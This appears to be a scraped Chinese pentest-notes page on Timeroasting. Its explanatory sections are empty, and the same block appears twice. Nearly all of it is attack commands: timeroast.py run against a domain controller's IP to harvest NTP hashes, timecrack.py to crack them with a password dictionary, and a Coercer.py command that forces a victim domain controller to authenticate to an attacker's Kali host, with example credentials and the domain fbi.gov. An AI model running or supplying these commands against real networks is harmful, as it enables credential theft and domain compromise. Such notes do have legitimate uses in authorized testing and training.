Timeroasting
原理
利用
chmod 777 Timeroast
python3 timeroast.py 10.0.0.42 | tee ntp-hashes.txt
# timeroast目录下的timeroast.py,IP为域控的IP
python3 timecrack.py ntp-hashes.txt pwd.txt
# pwd.txt是密码字典

利用场景




Last updated
chmod 777 Timeroast
python3 timeroast.py 10.0.0.42 | tee ntp-hashes.txt
# timeroast目录下的timeroast.py,IP为域控的IP
python3 timecrack.py ntp-hashes.txt pwd.txt
# pwd.txt是密码字典





Last updated
python3 Coercer.py coerce -l 10.10.10.10 -t 10.10.10.139 -u "test233\$" -p "Ice231..." -d fbi.gov -v
# 10.10.10.10为kali的IP,10.10.10.139为域控(受害机器)IP